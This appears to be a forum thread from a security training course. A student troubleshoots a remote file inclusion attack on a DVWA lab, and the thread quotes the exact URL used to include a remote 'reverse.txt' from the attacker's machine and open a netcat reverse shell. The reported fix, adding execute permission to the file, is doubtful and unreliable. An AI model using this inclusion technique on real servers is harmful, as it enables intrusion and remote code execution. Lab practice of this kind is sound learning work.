- This topic has 5 replies, 3 voices, and was last updated 2 years ago by
.
- Posts
When I execute the URL to establish the reverse connection, no connection is made by netcat. DVWA is set to “low. I receive these two messages right below the URL bar:
“Warning: include(http:/10.0.2.6/reverse.txt) [function.include]: failed to open stream: No such file or directory in /var/www/dvwa/vulnerabilities/fi/index.php on line 35.
Warning: include() [function.include]: Failed opening ‘http:/10.0.2.6/reverse.txt’ for inclusion (include_path=’.:/usr/share/php:/usr/share/pear:../../external/phpids/0.6/lib/’) in /var/www/dvwa/vulnerabilities/fi/index.php on line 35”.
This is similar to errors I got with local file inclusion.Both Kali and Metasploitable are set to NatNetwork; Kali apache2 server is running. Phpini file edited to allow_url On. Thanks is advance.
Vashisht,
This is the exact URL I used – http://10.0.2.7/dvwa/vulnerabilities/fi/?page=http:/10.0.2.6/reverse.txt
kali machine is on 10.0.2.6, with apach2 server started. dvwa is on 10.0.2.7. reverse.txt file is in /var/www/html directory. Dvwa set to “low” security. Thanks in advance for your help. Have not had any luck finding the solution searching the web.
That didn’t work, so I got to thinking about the php file. Since it had an extension of .txt, it probably couldn’t be executed without adding execution permissions. I did that and now it works. Thanks,
Tom
- You must be logged in to reply to this topic.
